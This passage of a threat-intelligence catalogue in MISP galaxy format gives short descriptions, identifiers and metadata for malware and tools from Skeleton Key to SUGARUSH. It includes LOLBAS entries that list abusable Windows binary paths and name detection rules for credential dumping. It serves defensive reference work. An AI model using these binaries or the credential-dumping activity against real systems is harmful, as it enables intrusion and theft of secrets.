Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. [Dell Skeleton] Functionality similar to Skeleton Key is included as a module in Mimikatz.
Internal MISP references
UUID 206453a4-a298-4cab-9fdf-f136a4e0c761 which can be used as unique global reference for Skeleton Key in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0007 |
| source | MITRE |
| type | ['malware'] |
Skidmap
Skidmap is a kernel-mode rootkit used for cryptocurrency mining.[Trend Micro Skidmap]
Internal MISP references
UUID cc91d3d4-bbf5-4a9c-b43a-2ba034db4858 which can be used as unique global reference for Skidmap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux'] |
| software_attack_id | S0468 |
| source | MITRE |
| type | ['malware'] |
Sliver
Sliver is an open source, cross-platform, red team command and control framework written in Golang.[Bishop Fox Sliver Framework August 2019]
Internal MISP references
UUID bbd16b7b-7e35-4a11-86ff-9b19e17bdab3 which can be used as unique global reference for Sliver in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux', 'Windows'] |
| software_attack_id | S0633 |
| source | MITRE |
| tags | ['e81ba503-60b0-4b64-8f20-ef93e7783796'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SLOTHFULMEDIA
SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.[CISA MAR SLOTHFULMEDIA October 2020][Costin Raiu IAmTheKing October 2020] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[USCYBERCOM SLOTHFULMEDIA October 2020][Kaspersky IAmTheKing October 2020]
In October 2020, Kaspersky Labs assessed SLOTHFULMEDIA is part of an activity cluster it refers to as "IAmTheKing".[Kaspersky IAmTheKing October 2020] ESET also noted code similarity between SLOTHFULMEDIA and droppers used by a group it refers to as "PowerPool".[ESET PowerPool Code October 2020]
Internal MISP references
UUID 563c6534-497e-4d65-828c-420d5bb2041a which can be used as unique global reference for SLOTHFULMEDIA in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0533 |
| source | MITRE |
| type | ['malware'] |
SLOWDRIFT
SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 7c047a54-93cf-4dfc-ab20-d905791aebb2 which can be used as unique global reference for SLOWDRIFT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0218 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Small Sieve
Small Sieve is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][NCSC GCHQ Small Sieve Jan 2022]
Security researchers have also noted Small Sieve's use by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022]
Internal MISP references
UUID c58028b9-2e79-4bc9-9b04-d24ea4dd4948 which can be used as unique global reference for Small Sieve in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1035 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SMOKEDHAM
SMOKEDHAM is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.[FireEye Shining A Light on DARKSIDE May 2021][FireEye SMOKEDHAM June 2021]
Internal MISP references
UUID 9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3 which can be used as unique global reference for SMOKEDHAM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0649 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Smoke Loader
Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [Malwarebytes SmokeLoader 2016] [Microsoft Dofoil 2018]
Internal MISP references
UUID 2244253f-a4ad-4ea9-a4bf-fa2f4d895853 which can be used as unique global reference for Smoke Loader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0226 |
| source | MITRE |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Snip3
Snip3 is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including AsyncRAT, Revenge RAT, Agent Tesla, and NETWIRE.[Morphisec Snip3 May 2021][Telefonica Snip3 December 2021]
Internal MISP references
UUID f587dc27-92be-5894-a4a8-d6c8bbcf8ede which can be used as unique global reference for Snip3 in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1086 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SNUGRIDE
SNUGRIDE is a backdoor that has been used by menuPass as first stage malware. [FireEye APT10 April 2017]
Internal MISP references
UUID d6c24f7c-fe79-4094-8f3c-68c4446ae4c7 which can be used as unique global reference for SNUGRIDE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0159 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Socksbot
Socksbot is a backdoor that abuses Socket Secure (SOCKS) proxies. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID c1906bb6-0b5b-4916-8b29-37f7e272f6b3 which can be used as unique global reference for Socksbot in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0273 |
| source | MITRE |
| type | ['malware'] |
SodaMaster
SodaMaster is a fileless malware used by menuPass to download and execute payloads since at least 2020.[Securelist APT10 March 2021]
Internal MISP references
UUID 6ecd970c-427b-4421-a831-69f46047d22a which can be used as unique global reference for SodaMaster in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0627 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SoftPerfect Network Scanner
SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 4272447f-8803-4947-b66f-051eecdd3385 which can be used as unique global reference for SoftPerfect Network Scanner in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5008 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
SombRAT
SombRAT is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including FIVEHANDS ransomware.[BlackBerry CostaRicto November 2020][FireEye FiveHands April 2021][CISA AR21-126A FIVEHANDS May 2021]
Internal MISP references
UUID 0ec24158-d5d7-4d2e-b5a5-bc862328a317 which can be used as unique global reference for SombRAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0615 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
SoreFang
SoreFang is first stage downloader used by APT29 for exfiltration and to load other malware.[NCSC APT29 July 2020][CISA SoreFang July 2016]
Internal MISP references
UUID 3e959586-14ff-407b-a0d0-4e9580546f3f which can be used as unique global reference for SoreFang in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0516 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SOUNDBITE
SOUNDBITE is a signature backdoor used by APT32. [FireEye APT32 May 2017]
Internal MISP references
UUID 069538a5-3cb8-4eb4-9fbb-83867bb4d826 which can be used as unique global reference for SOUNDBITE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0157 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SPACESHIP
SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 0f8d0a73-9cd3-475a-b31b-d457278c921a which can be used as unique global reference for SPACESHIP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0035 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Spark
Spark is a Windows backdoor and has been in use since as early as 2017.[Unit42 Molerat Mar 2020]
Internal MISP references
UUID 93f8c180-6794-4e9c-b716-6b31f42eb72d which can be used as unique global reference for Spark in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0543 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SpeakUp
SpeakUp is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. [CheckPoint SpeakUp Feb 2019]
Internal MISP references
UUID b9b67878-4eb1-4a0b-9b36-a798881ed566 which can be used as unique global reference for SpeakUp in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS', 'Linux'] |
| software_attack_id | S0374 |
| source | MITRE |
| type | ['malware'] |
Sphynx
Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.[X-Force BlackCat May 30 2023] Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.[Microsoft Threat Intelligence Tweet August 17 2023]
Internal MISP references
UUID cdbebd0a-3036-4a24-b1d5-a3f0ca9c758e which can be used as unique global reference for Sphynx in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5055 |
| source | Tidal Cyber |
| tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SpicyOmelette
SpicyOmelette is a JavaScript based remote access tool that has been used by Cobalt Group since at least 2018.[Secureworks GOLD KINGSWOOD September 2018]
Internal MISP references
UUID 2be9e22d-0af8-46f5-b30e-b3712ccf716d which can be used as unique global reference for SpicyOmelette in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0646 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Splashtop
Splashtop is a tool used to enable remote connections to network devices for support and administration.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID ecf8b878-19e5-425b-bc34-d5ed6e999fea which can be used as unique global reference for Splashtop in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5009 |
| source | Tidal Cyber |
| tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '9bc47297-864d-4f39-be37-ad9379102853', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
spwebmember
spwebmember is a Microsoft SharePoint enumeration and data dumping tool written in .NET. [NCC Group APT15 Alive and Strong]
Internal MISP references
UUID 0fdabff3-d996-493c-af67-f3ac02e4b00b which can be used as unique global reference for spwebmember in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0227 |
| source | MITRE |
| tags | ['cd1b5d44-226e-4405-8985-800492cf2865', '4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Sqldumper
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Debugging utility included with Microsoft SQL.
Author: Oddvar Moe
Paths: * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
Resources: * https://twitter.com/countuponsec/status/910969424215232518 * https://twitter.com/countuponsec/status/910977826853068800 * https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
Detection: * Sigma: proc_creation_win_lolbin_susp_sqldumper_activity.yml * Elastic: credential_access_lsass_memdump_file_created.toml * Elastic: credential_access_cmdline_dump_tool.toml[Sqldumper.exe - LOLBAS Project]
Internal MISP references
UUID 146bd853-166b-4859-b4d7-b70f51bfd8e9 which can be used as unique global reference for Sqldumper in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5235 |
| source | Tidal Cyber |
| tags | ['e992169d-832d-44e9-8218-0f4ab0ff72b4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
sqlmap
sqlmap is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. [sqlmap Introduction]
Internal MISP references
UUID 96c224a6-6ca4-4ac1-9990-d863ec5a317a which can be used as unique global reference for sqlmap in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0225 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Sqlps
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Author: Oddvar Moe
Paths: * C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe * C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Resources: * https://twitter.com/ManuelBerrueta/status/1527289261350760455 * https://twitter.com/bryon_/status/975835709587075072 * https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection: * Sigma: proc_creation_win_mssql_sqlps_susp_execution.yml * Sigma: image_load_dll_system_management_automation_susp_load.yml * Elastic: execution_suspicious_powershell_imgload.toml * Splunk: 2021-10-05-suspicious_copy_on_system32.md[Sqlps.exe - LOLBAS Project]
Internal MISP references
UUID 5b3c03d3-9ea1-4322-a422-ab2401ffc294 which can be used as unique global reference for Sqlps in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5236 |
| source | Tidal Cyber |
| tags | ['da7e88fd-2d71-4928-81ce-e3d455b3d418', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SQLRat
SQLRat is malware that executes SQL scripts to avoid leaving traditional host artifacts. FIN7 has been observed using it.[Flashpoint FIN 7 March 2019]
Internal MISP references
UUID 612f780a-239a-4bd0-a29f-63beadf3ed22 which can be used as unique global reference for SQLRat in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0390 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
SQLToolsPS
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: Oddvar Moe
Paths: * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Resources: * https://twitter.com/pabraeken/status/993298228840992768 * https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection: * Sigma: proc_creation_win_mssql_sqltoolsps_susp_execution.yml * Splunk: 2021-10-05-suspicious_copy_on_system32.md[SQLToolsPS.exe - LOLBAS Project]
Internal MISP references
UUID 9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6 which can be used as unique global reference for SQLToolsPS in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5237 |
| source | Tidal Cyber |
| tags | ['f4867256-402a-4bcb-97d3-e071ee0993c1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Squirrel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Reegun J (OCBC Bank) - @reegun21
Paths: * %localappdata%\Microsoft\Teams\current\Squirrel.exe
Resources: * https://www.youtube.com/watch?v=rOP3hnkj7ls * https://twitter.com/reegun21/status/1144182772623269889 * http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ * https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 * https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
Detection: * Sigma: proc_creation_win_lolbin_squirrel.yml[Squirrel.exe - LOLBAS Project]
Internal MISP references
UUID 13d5d060-8462-4592-8efb-2243fd2138d1 which can be used as unique global reference for Squirrel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5238 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Squirrelwaffle
Squirrelwaffle is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as Cobalt Strike and the QakBot banking trojan.[ZScaler Squirrelwaffle Sep 2021][Netskope Squirrelwaffle Oct 2021]
Internal MISP references
UUID 46943a69-0b19-4d3a-b2a3-1302e85239a3 which can be used as unique global reference for Squirrelwaffle in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1030 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
ssh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: Akshat Pradhan
Paths: * c:\windows\system32\OpenSSH\ssh.exe
Resources: * https://gtfobins.github.io/gtfobins/ssh/
Detection: * Sigma: proc_creation_win_lolbin_ssh.yml * IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe. * IOC: command line arguments specifying execution.[ssh.exe - LOLBAS Project]
Internal MISP references
UUID 7b607493-5035-4e29-9f95-55362f53b805 which can be used as unique global reference for ssh in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5164 |
| source | Tidal Cyber |
| tags | ['6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '64a55f86-15db-4599-b165-81be7f024397', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
SslMM
SslMM is a full-featured backdoor used by Naikon that has multiple variants. [Baumgartner Naikon 2015]
Internal MISP references
UUID 3334a124-3e74-4a90-8ed1-55eea3274b19 which can be used as unique global reference for SslMM in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0058 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Starloader
Starloader is a loader component that has been observed loading Felismus and associated tools. [Symantec Sowbug Nov 2017]
Internal MISP references
UUID fc18e220-2200-4d70-a426-0700ba14c4c0 which can be used as unique global reference for Starloader in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0188 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
STARWHALE
STARWHALE is Windows Script File (WSF) backdoor that has been used by MuddyWater, possibly since at least November 2021; there is also a STARWHALE variant written in Golang with similar capabilities. Security researchers have also noted the use of STARWHALE by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022][DHS CISA AA22-055A MuddyWater February 2022]
Internal MISP references
UUID 764c6121-2d15-4a10-ac53-b1c431dc8b47 which can be used as unique global reference for STARWHALE in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1037 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
StoneDrill
StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[FireEye APT33 Sept 2017][Kaspersky StoneDrill 2017]
Internal MISP references
UUID 9eee52a2-5ac1-4561-826c-23ec7fbc7876 which can be used as unique global reference for StoneDrill in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0380 |
| source | MITRE |
| tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Stordiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Storage diagnostic tool
Author: Eral4m
Paths: * c:\windows\system32\stordiag.exe * c:\windows\syswow64\stordiag.exe
Resources: * https://twitter.com/eral4m/status/1451112385041911809
Detection: * Sigma: proc_creation_win_stordiag_susp_child_process.yml * IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\[Stordiag.exe - LOLBAS Project]
Internal MISP references
UUID 7430c53f-41a0-4395-88c7-fc2c34ee52c7 which can be used as unique global reference for Stordiag in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5165 |
| source | Tidal Cyber |
| tags | ['f0e3d6ea-d7ea-4d73-b868-1076fac744a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
StreamEx
StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. [Cylance Shell Crew Feb 2017]
Internal MISP references
UUID 502b490c-2067-40a4-8f73-7245d7910851 which can be used as unique global reference for StreamEx in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0142 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrifeWater
StrifeWater is a remote-access tool that has been used by Moses Staff in the initial stages of their attacks since at least November 2021.[Cybereason StrifeWater Feb 2022]
Internal MISP references
UUID dd8bb0a3-6cb1-412d-adeb-cbaae98462a9 which can be used as unique global reference for StrifeWater in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1034 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrongPity
StrongPity is an information stealing malware used by PROMETHIUM.[Bitdefender StrongPity June 2020][Talos Promethium June 2020]
Internal MISP references
UUID ed563524-235e-4e06-8c69-3f9d8ddbfd8a which can be used as unique global reference for StrongPity in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0491 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Stuxnet
Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011][CISA ICS Advisory ICSA-10-272-01][ESET Stuxnet Under the Microscope][Langer Stuxnet] Stuxnet was discovered in 2010, with some components being used as early as November 2008.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011]
Internal MISP references
UUID 3fdf3833-fca9-4414-8d2e-779dabc4ee31 which can be used as unique global reference for Stuxnet in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0603 |
| source | MITRE |
| tags | ['a98d7a43-f227-478e-81de-e7299639a355'] |
| type | ['malware'] |
S-Type
S-Type is a backdoor that was used in Operation Dust Storm since at least 2013.[Cylance Dust Storm]
Internal MISP references
UUID b19b6c38-d38b-46f2-a535-d0bfc5790368 which can be used as unique global reference for S-Type in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0085 |
| source | MITRE |
| type | ['malware'] |
SUGARDUMP
SUGARDUMP is a proprietary browser credential harvesting tool that was used by UNC3890 during the C0010 campaign. The first known SUGARDUMP version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 6ff7bf2e-286c-4b1b-92a0-1e5322870c59 which can be used as unique global reference for SUGARDUMP in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1042 |
| source | MITRE |
| type | ['malware'] |
SUGARUSH
SUGARUSH is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. SUGARUSH was first identified during analysis of UNC3890's C0010 campaign targeting Israeli companies, which began in late 2020.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 004c781a-3d7d-446b-9677-a042c8f6566e which can be used as unique global reference for SUGARUSH in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1049 |
| source | MITRE |
| type | ['malware'] |
SUNBURST
